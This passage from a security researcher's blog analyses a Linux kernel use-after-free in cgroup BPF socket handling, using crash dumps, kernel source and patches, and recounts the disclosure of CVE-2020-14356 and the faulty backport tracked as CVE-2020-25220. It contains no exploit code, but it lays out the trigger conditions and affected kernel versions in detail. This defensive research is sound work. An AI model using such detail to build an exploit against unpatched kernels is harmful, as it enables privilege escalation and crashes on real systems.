$6 = 0x6b6b6b6b6b6b6b6b
crash> x/20a 0xffff9ce3e2416800
0xffff9ce3e2416800:     0x6b6b6b6b6b6b016b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416810:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416820:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416830:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416840:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416850:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416860:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416870:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416880:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
0xffff9ce3e2416890:     0x6b6b6b6b6b6b6b6b      0x6b6b6b6b6b6b6b6b
crash>

This pointer (struct cgroup *)

	cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data);

Points to the freed object. However, kernel still keeps eBPF rules attached to the socket under cgroups. When process (sshd) dies (do_exit() call) and cleanup is executed, all sockets are being closed. If such socket has “pending” packets, the following code path is executed:

do_exit -> ... -> sock_close -> __sock_release -> inet_release -> tcp_close -> __tcp_push_pending_frames -> tcp_write_xmit -> __tcp_transmit_skb -> __ip_queue_xmit -> ip_finish_output -> __cgroup_bpf_run_filter_skb

However, there is nothing wrong with such logic and path. The real problem is that cgroups disappeared while still holding active clients. How is that even possible? Just before the crash I can see the following entry in kernel logs:

[190820.457422] ------------[ cut here ]------------
[190820.457465] percpu ref (cgroup_bpf_release_fn) <= 0 (-70581) after switching to atomic
                            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[190820.457511] WARNING: CPU: 0 PID: 9 at lib/percpu-refcount.c:161 percpu_ref_switch_to_atomic_rcu+0x112/0x120
[190820.457511] Modules linked in: [last unloaded: p_lkrg]
[190820.457513] CPU: 0 PID: 9 Comm: ksoftirqd/0 Kdump: loaded Tainted: G           OE     5.7.0-g4 #28
[190820.457513] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[190820.457515] RIP: 0010:percpu_ref_switch_to_atomic_rcu+0x112/0x120
[190820.457516] Code: eb b6 80 3d 11 95 5a 02 00 0f 85 65 ff ff ff 48 8b 55 d8 48 8b 75 e8 48 c7 c7 d0 9f 78 93 c6 05 f5 94 5a 02 01 e8 00 57 88 ff <0f> 0b e9 43 ff ff ff 0f 0b eb 9d cc cc cc 8d 8c 16 ef be ad de 89
[190820.457516] RSP: 0018:ffffb136c0087e00 EFLAGS: 00010286
[190820.457517] RAX: 0000000000000000 RBX: 7ffffffffffeec4a RCX: 0000000000000000
[190820.457517] RDX: 0000000000000101 RSI: ffffffff949235c0 RDI: 00000000ffffffff
[190820.457517] RBP: ffff9ce3e204af20 R08: 6d6f7461206f7420 R09: 63696d6f7461206f
[190820.457517] R10: 7320726574666120 R11: 676e696863746977 R12: 00003452c5002ce8
[190820.457518] R13: ffff9ce3f6e2b450 R14: ffff9ce2c7fc3100 R15: 0000000000000000
[190820.457526] FS:  0000000000000000(0000) GS:ffff9ce3f6e00000(0000) knlGS:0000000000000000
[190820.457527] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[190820.457527] CR2: 00007f516c2b9000 CR3: 0000000222c64006 CR4: 00000000003606f0
[190820.457550] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[190820.457551] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[190820.457551] Call Trace:
[190820.457577]  rcu_core+0x1df/0x530
[190820.457598]  ? smpboot_register_percpu_thread+0xd0/0xd0
[190820.457609]  __do_softirq+0xfc/0x331
[190820.457629]  ? smpboot_register_percpu_thread+0xd0/0xd0
[190820.457630]  run_ksoftirqd+0x21/0x30
[190820.457649]  smpboot_thread_fn+0x195/0x230
[190820.457660]  kthread+0x139/0x160
[190820.457670]  ? __kthread_bind_mask+0x60/0x60
[190820.457671]  ret_from_fork+0x35/0x40
[190820.457682] ---[ end trace 63d2aef89e998452 ]---

I was testing the same scenario a few times and I had the following results:

 percpu ref (cgroup_bpf_release_fn) <= 0 (-70581) after switching to atomic
 percpu ref (cgroup_bpf_release_fn) <= 0 (-18829) after switching to atomic
 percpu ref (cgroup_bpf_release_fn) <= 0 (-29849) after switching to atomic

Let’s look at this function:

/**
 * cgroup_bpf_release_fn() - callback used to schedule releasing
 *                           of bpf cgroup data
 * @ref: percpu ref counter structure
 */
static void cgroup_bpf_release_fn(struct percpu_ref *ref)
{
	struct cgroup *cgrp = container_of(ref, struct cgroup, bpf.refcnt);

	INIT_WORK(&cgrp->bpf.release_work, cgroup_bpf_release);
	queue_work(system_wq, &cgrp->bpf.release_work);
}

So that’s the callback used to release bpf cgroup data. Sounds like it is being called while there could be still active socket attached to such cgroup:

/**
 * cgroup_bpf_release() - put references of all bpf programs and
 *                        release all cgroup bpf data
 * @work: work structure embedded into the cgroup to modify
 */
static void cgroup_bpf_release(struct work_struct *work)
{
	struct cgroup *p, *cgrp = container_of(work, struct cgroup,
					       bpf.release_work);
	struct bpf_prog_array *old_array;
	unsigned int type;

	mutex_lock(&cgroup_mutex);

	for (type = 0; type < ARRAY_SIZE(cgrp->bpf.progs); type++) {
		struct list_head *progs = &cgrp->bpf.progs[type];
		struct bpf_prog_list *pl, *tmp;

		list_for_each_entry_safe(pl, tmp, progs, node) {
			list_del(&pl->node);
			if (pl->prog)
				bpf_prog_put(pl->prog);
			if (pl->link)
				bpf_cgroup_link_auto_detach(pl->link);
			bpf_cgroup_storages_unlink(pl->storage);
			bpf_cgroup_storages_free(pl->storage);
			kfree(pl);
			static_branch_dec(&cgroup_bpf_enabled_key);
		}
		old_array = rcu_dereference_protected(
				cgrp->bpf.effective[type],
				lockdep_is_held(&cgroup_mutex));
		bpf_prog_array_free(old_array);
	}

	mutex_unlock(&cgroup_mutex);

	for (p = cgroup_parent(cgrp); p; p = cgroup_parent(p))
		cgroup_bpf_put(p);

	percpu_ref_exit(&cgrp->bpf.refcnt);
	cgroup_put(cgrp);
}

while:

static void bpf_cgroup_link_auto_detach(struct bpf_cgroup_link *link)
{
	cgroup_put(link->cgroup);
	link->cgroup = NULL;
}

So if cgroup dies, all the potential clients are being auto_detached. However, they might not be aware about such situation. When is cgroup_bpf_release_fn() executed?

/**
 * cgroup_bpf_inherit() - inherit effective programs from parent
 * @cgrp: the cgroup to modify
 */
int cgroup_bpf_inherit(struct cgroup *cgrp)
{
    ...
  	ret = percpu_ref_init(&cgrp->bpf.refcnt, cgroup_bpf_release_fn, 0,
			      GFP_KERNEL);
    ...
}

It is automatically executed when cgrp->bpf.refcnt drops to 1. However, in the warning logs before kernel had crashed, we saw that such reference counter is below 0. Cgroup was already freed.

Originally, I thought that the problem might be related to the code walking through the cgroup hierarchy without holding cgroup_mutex, which was pointed out by Alexei. I’ve prepared the patch and recompiled the kernel:

$ diff -u cgroup.c linux-5.7/kernel/bpf/cgroup.c
--- cgroup.c    2020-05-31 23:49:15.000000000 +0000
+++ linux-5.7/kernel/bpf/cgroup.c       2020-07-17 16:31:10.712969480 +0000
@@ -126,11 +126,11 @@
                bpf_prog_array_free(old_array);
        }

-       mutex_unlock(&cgroup_mutex);
-
        for (p = cgroup_parent(cgrp); p; p = cgroup_parent(p))
                cgroup_bpf_put(p);

+       mutex_unlock(&cgroup_mutex);
+
        percpu_ref_exit(&cgrp->bpf.refcnt);
        cgroup_put(cgrp);
 }

Interestingly, without this patch I was able to generate this kernel crash every time when I was rebooting the machine (100% repro). After this patch crashing ratio dropped to around 30%. However, I was still able to hit the same code-path and generate kernel dump. The patch indeed helps but it looks like it’s not the real problem since I can still hit the crash (just much less often).

I stepped back and looked again where the bug is. Corrupted pointer (struct cgroup *) is comming from that line:

	cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data);

this code is related to the CONFIG_SOCK_CGROUP_DATA. Linux source has an interesting comment about it in “cgroup-defs.h” file:

/*
 * sock_cgroup_data is embedded at sock->sk_cgrp_data and contains
 * per-socket cgroup information except for memcg association.
 *
 * On legacy hierarchies, net_prio and net_cls controllers directly set
 * attributes on each sock which can then be tested by the network layer.
 * On the default hierarchy, each sock is associated with the cgroup it was
 * created in and the networking layer can match the cgroup directly.
 *
 * To avoid carrying all three cgroup related fields separately in sock,
 * sock_cgroup_data overloads (prioidx, classid) and the cgroup pointer.
 * On boot, sock_cgroup_data records the cgroup that the sock was created
 * in so that cgroup2 matches can be made; however, once either net_prio or
 * net_cls starts being used, the area is overriden to carry prioidx and/or
 * classid.  The two modes are distinguished by whether the lowest bit is
 * set.  Clear bit indicates cgroup pointer while set bit prioidx and
 * classid.
 *
 * While userland may start using net_prio or net_cls at any time, once
 * either is used, cgroup2 matching no longer works.  There is no reason to
 * mix the two and this is in line with how legacy and v2 compatibility is
 * handled.  On mode switch, cgroup references which are already being
 * pointed to by socks may be leaked.  While this can be remedied by adding
 * synchronization around sock_cgroup_data, given that the number of leaked
 * cgroups is bound and highly unlikely to be high, this seems to be the
 * better trade-off.
 */

and later:

/*
 * There's a theoretical window where the following accessors race with
 * updaters and return part of the previous pointer as the prioidx or
 * classid.  Such races are short-lived and the result isn't critical.
 */

This means that sock_cgroup_data “carries” the information whether net_prio or net_cls starts being used and in such case sock_cgroup_data overloads (prioidx, classid) and the cgroup pointer. In our crash we can extract this information:

crash> print/a ((struct sock *)0xffff9ce3de26b280)->sk_cgrp_data
$5 = {
  {
    {
      is_data = 0x0,
      padding = 0x68,
      prioidx = 0xe241,
      classid = 0xffff9ce3
    },
    val = 0xffff9ce3e2416800
  }
}

Described socket keeps the “sk_cgrp_data” pointer with the information of being “attached” to the cgroup2. However, cgroup2 has been destroyed.
Now we have all the information to solve the mystery of this bug:

Process creates a socket and both of them are inside some cgroup v2 (non-root)
- cgroup BPF is cgroup2 only
At some point net_prio or net_cls is being used:
- this operation is disabling cgroup2 socket matching
- now, all related sockets should be converted to use net_prio, and sk_cgrp_data should be updated
The socket is cloned, but not the reference to the cgroup (ref: point 1)
- this essentially moves the socket to the new cgroup
All tasks in the old cgroup (ref: point 1) must die and when this happens, this cgroup dies as well
When original process is starting to “use” the socket, it might attempt to access cgroup which is already “dead”. This essentially generates Use-After-Free condition
- in my specific case, process was killed or invoked exit()
- during the execution of do_exit() function, all file descriptors and all sockets are being closed
- one of the socket still points to the previously destroyed cgroup2 BPF (OpenSSH might install BPF)
- __cgroup_bpf_run_filter_skb runs attached BPF and we have Use-After-Free

To confirm that scenario, I’ve modified some of the Linux kernel sources:

Function cgroup_sk_alloc_disable():
- I’ve added dump_stack();
Function cgroup_bpf_release():
- I’ve moved mutex to guard code responsible for walking through the cgroup hierarchy

I’ve managed to reproduce this bug again and this is what I can see in the logs:

...
[   72.061197] kmem.limit_in_bytes is deprecated and will be removed. Please report your usecase to linux-mm@kvack.org if you depend on this functionality.
[   72.121572] cgroup: cgroup: disabling cgroup2 socket matching due to net_prio or net_cls activation
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[   72.121574] CPU: 0 PID: 6958 Comm: kubelet Kdump: loaded Not tainted 5.7.0-g6 #32
[   72.121574] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[   72.121575] Call Trace:
[   72.121580]  dump_stack+0x50/0x70
[   72.121582]  cgroup_sk_alloc_disable.cold+0x11/0x25
                ^^^^^^^^^^^^^^^^^^^^^^^
[   72.121584]  net_prio_attach+0x22/0xa0
                ^^^^^^^^^^^^^^^
[   72.121586]  cgroup_migrate_execute+0x371/0x430
[   72.121587]  cgroup_attach_task+0x132/0x1f0
[   72.121588]  __cgroup1_procs_write.constprop.0+0xff/0x140
                ^^^^^^^^^^^^^^^^^^^^^^
[   72.121590]  kernfs_fop_write+0xc9/0x1a0
[   72.121592]  vfs_write+0xb1/0x1a0
[   72.121593]  ksys_write+0x5a/0xd0
[   72.121595]  do_syscall_64+0x47/0x190
[   72.121596]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   72.121598] RIP: 0033:0x48abdb
[   72.121599] Code: ff e9 69 ff ff ff cc cc cc cc cc cc cc cc cc e8 7b 68 fb ff 48 8b 7c 24 10 48 8b 74 24 18 48 8b 54 24 20 48 8b 44 24 08 0f 05 <48> 3d 01 f0 ff ff 76 20 48 c7 44 24 28 ff ff ff ff 48 c7 44 24 30
[   72.121600] RSP: 002b:000000c00110f778 EFLAGS: 00000212 ORIG_RAX: 0000000000000001
[   72.121601] RAX: ffffffffffffffda RBX: 000000c000060000 RCX: 000000000048abdb
[   72.121601] RDX: 0000000000000004 RSI: 000000c00110f930 RDI: 000000000000001e
[   72.121601] RBP: 000000c00110f7c8 R08: 000000c00110f901 R09: 0000000000000004
[   72.121602] R10: 000000c0011a39a0 R11: 0000000000000212 R12: 000000000000019b
[   72.121602] R13: 000000000000019a R14: 0000000000000200 R15: 0000000000000000

As we can see, net_prio is being activated and cgroup2 socket matching is being disabled. Next:

[  287.497527] percpu ref (cgroup_bpf_release_fn) <= 0 (-79) after switching to atomic
[  287.497535] WARNING: CPU: 0 PID: 9 at lib/percpu-refcount.c:161 percpu_ref_switch_to_atomic_rcu+0x11f/0x12a
[  287.497536] Modules linked in:
[  287.497537] CPU: 0 PID: 9 Comm: ksoftirqd/0 Kdump: loaded Not tainted 5.7.0-g6 #32
[  287.497538] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[  287.497539] RIP: 0010:percpu_ref_switch_to_atomic_rcu+0x11f/0x12a

cgroup_bpf_release_fn is being executed multiple times. All cgroup BPF entries has been deleted and freed. Next:

[  287.543976] general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6b6b: 0000 [#1] PREEMPT SMP PTI
[  287.544062] CPU: 0 PID: 11398 Comm: realpath Kdump: loaded Tainted: G        W         5.7.0-g6 #32
[  287.544133] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[  287.544217] RIP: 0010:__cgroup_bpf_run_filter_skb+0xd4/0x230
[  287.544267] Code: 00 48 01 c8 48 89 43 50 41 83 ff 01 0f 84 c2 00 00 00 e8 6f 55 f1 ff e8 5a 3e f5 ff 44 89 fa 48 8d 84 d5 e0 03 00 00 48 8b 00 <48> 8b 78 10 4c 8d 78 10 48 85 ff 0f 84 29 01 00 00 bd 01 00 00 00
[  287.544398] RSP: 0018:ffff957740003af8 EFLAGS: 00010206
[  287.544446] RAX: 6b6b6b6b6b6b6b6b RBX: ffff8911f339cf00 RCX: 0000000000000028
[  287.544506] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000001
[  287.544566] RBP: ffff8911e2eb5000 R08: 0000000000000000 R09: 0000000000000001
[  287.544625] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000014
[  287.544685] R13: 0000000000000014 R14: 0000000000000000 R15: 0000000000000000
[  287.544753] FS:  00007f86e885a580(0000) GS:ffff8911f6e00000(0000) knlGS:0000000000000000
[  287.544833] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  287.544919] CR2: 000055fb75e86da4 CR3: 0000000221316003 CR4: 00000000003606f0
[  287.544996] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  287.545063] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[  287.545129] Call Trace:
[  287.545167]  
[  287.545204]  sk_filter_trim_cap+0x10c/0x250
[  287.545253]  ? nf_ct_deliver_cached_events+0xb6/0x120
[  287.545308]  ? tcp_v4_inbound_md5_hash+0x47/0x160
[  287.545359]  tcp_v4_rcv+0xb49/0xda0
[  287.545404]  ? nf_hook_slow+0x3a/0xa0
[  287.545449]  ip_protocol_deliver_rcu+0x26/0x1d0
[  287.545500]  ip_local_deliver_finish+0x50/0x60
[  287.545550]  ip_sublist_rcv_finish+0x38/0x50
[  287.545599]  ip_sublist_rcv+0x16d/0x200
[  287.545645]  ? ip_rcv_finish_core.constprop.0+0x470/0x470
[  287.545701]  ip_list_rcv+0xf1/0x115
[  287.545746]  __netif_receive_skb_list_core+0x249/0x270
[  287.545801]  netif_receive_skb_list_internal+0x19f/0x2c0
[  287.545856]  napi_complete_done+0x8e/0x130
[  287.545905]  e1000_clean+0x27e/0x600
[  287.545951]  ? security_cred_free+0x37/0x50
[  287.545999]  net_rx_action+0x133/0x3b0
[  287.546045]  __do_softirq+0xfc/0x331
[  287.546091]  irq_exit+0x92/0x110
[  287.546133]  do_IRQ+0x6d/0x120
[  287.546175]  common_interrupt+0xf/0xf
[  287.546219]  
[  287.546255] RIP: 0010:__x64_sys_exit_group+0x4/0x10

We have our crash referencing freed memory.

First CVE – CVE-2020-14356:

I’ve decided to report this issue to the Linux Kernel security mailing list around the mid-July (2020). Roman Gushchin replied to my report and suggested to verify if I can still repro this issue when commit ad0f75e5f57c (“cgroup: fix cgroup_sk_alloc() for sk_clone_lock()”) is applied. This commit was merged to the Linux Kernel git source tree just a few days before my report. I’ve carefully verified it and indeed it fixed the problem. However, commit ad0f75e5f57c is not fully complete and a follow-up fix 14b032b8f8fc (“cgroup: Fix sock_cgroup_data on big-endian.”) should be applied as well.

After this conversation Greg KH decided to backport Roman’s patches to the LTS kernels. In the meantime, I’ve decided to apply for CVE number (through RedHat) to track this issue:

CVE-2020-14356 was allocated to track this issue
For some unknown reasons, this bug was classified as NULL pointer dereference

RedHat correctly acknowledged this issue as Use-After-Free and in their own description and bugzilla they specify:

“A use-after-free flaw was found in the Linux kernel’s cgroupv2 (…)”
https://access.redhat.com/security/cve/cve-2020-14356
“It was found that the Linux kernel’s use after free issue (…)”
https://bugzilla.redhat.com/show_bug.cgi?id=1868453

However, in CVE MITRE portal we can see a very inaccurate description:

“A flaw null pointer dereference in the Linux kernel cgroupv2 subsystem in versions before 5.7.10 was found in the way when reboot the system. A local user could use this flaw to crash the system or escalate their privileges on the system.”
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14356

First, it is not NULL pointer dereference but Use-After-Free bug. Maybe it is badly classified based on that opened bug:
https://bugzilla.kernel.org/show_bug.cgi?id=208003

People have started to hit this Use-After-Free bug in the form of NULL pointer dereference “kernel panic”.

Additionally, the entire description of the bug is wrong. I’ve raised that concern to the CVE MITRE but the invalid description is still there. There is also a small Twitter discussion about that here:
https://twitter.com/Adam_pi3/status/1296212546043740160

Second CVE – CVE-2020-25220:

During analysis of this bug, I contacted Brad Spengler. When the patch for this issue was backported to LTS kernels, Brad noticed that it conflicted with his pre-existing backport, and that the upstream backport looked incorrect. I was surprised since I had reviewed the original commit for mainline kernel (5.7) and it was fine. Having this in mind, I decided to carefully review the backported patch:
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-4.14.y&id=82fd2138a5ffd7e0d4320cdb669e115ee976a26e

and it really looks incorrect. Part of the original fix is the following code:

+void cgroup_sk_clone(struct sock_cgroup_data *skcd)
+{
+   if (skcd->val) {
+       if (skcd->no_refcnt)
+           return;
+       /*
+        * We might be cloning a socket which is left in an empty
+        * cgroup and the cgroup might have already been rmdir'd.
+        * Don't use cgroup_get_live().
+        */
+       cgroup_get(sock_cgroup_ptr(skcd));
+       cgroup_bpf_get(sock_cgroup_ptr(skcd));
+   }
+}

However, backported patch has the following logic:

+void cgroup_sk_clone(struct sock_cgroup_data *skcd)
+{
+   /* Socket clone path */
+   if (skcd->val) {
+       /*
+        * We might be cloning a socket which is left in an empty
+        * cgroup and the cgroup might have already been rmdir'd.
+        * Don't use cgroup_get_live().
+        */
+       cgroup_get(sock_cgroup_ptr(skcd));
+   }
+}

There is a missing check:

+       if (skcd->no_refcnt)
+           return;

which could result in reference counter bug and in the end Use-After-Free again. It looks like the backported patch for stable kernels is still buggy.

I’ve contacted RedHat again and they started to provide correct patches for their own kernels. However, LTS kernels were still buggy. I’ve also asked to assign a separate CVE for that issue but RedHat suggested that I do it myself.

After that, I went for vacation and forgot about this issue Recently, I’ve decided to apply for CVE to track the “bad patch” issue, and CVE-2020-25220 was allocated. It is worth to point out that someone from Huawei at some point realized that patch is wrong and LTS got a correct fix as well:

https://www.spinics.net/lists/stable/msg405099.html

What is worth to mention, grsecurity backport was never affected by the CVE-2020-25220.

Summary:

Original issue, tracked by CVE-2020-14356, affects kernels starting from 4.5+ up to 5.7.10.

RedHat correctly fixed all their kernels, and has proper description of the bug
CVE MITRE still has invalid and misleading description

Badly backported patch, tracked by CVE-2020-25220, affects kernels:

4.19 until version 4.19.140 (exclusive)
4.14 until version 4.14.194 (exclusive)
4.9 until version 4.9.233 (exclusive)

*grsecurity kernels were never affected by the CVE-2020-25220

Best regards,
Adam ‘pi3’ Zabrocki

LKRG 0.8

pi3 — Thu, 25 Jun 2020 21:49:31 +0000

Hi,

We’ve just announced a new version of LKRG 0.8! It includes enormous amount of changes – in fact, so much that we’re not trying to document all of the changes this time (although they can be seen from the git commits), but rather focus on high-level aspects. I encourage to read full announcement here:

https://www.openwall.com/lists/announce/2020/06/25/1

Btw. Among others, we have added support for Raspberry Pi 3 & 4, better scalability, performance, and tradeoffs, the notion of profiles, new documentation, @Phoronix benchmarks, and more

Best regards,
Adam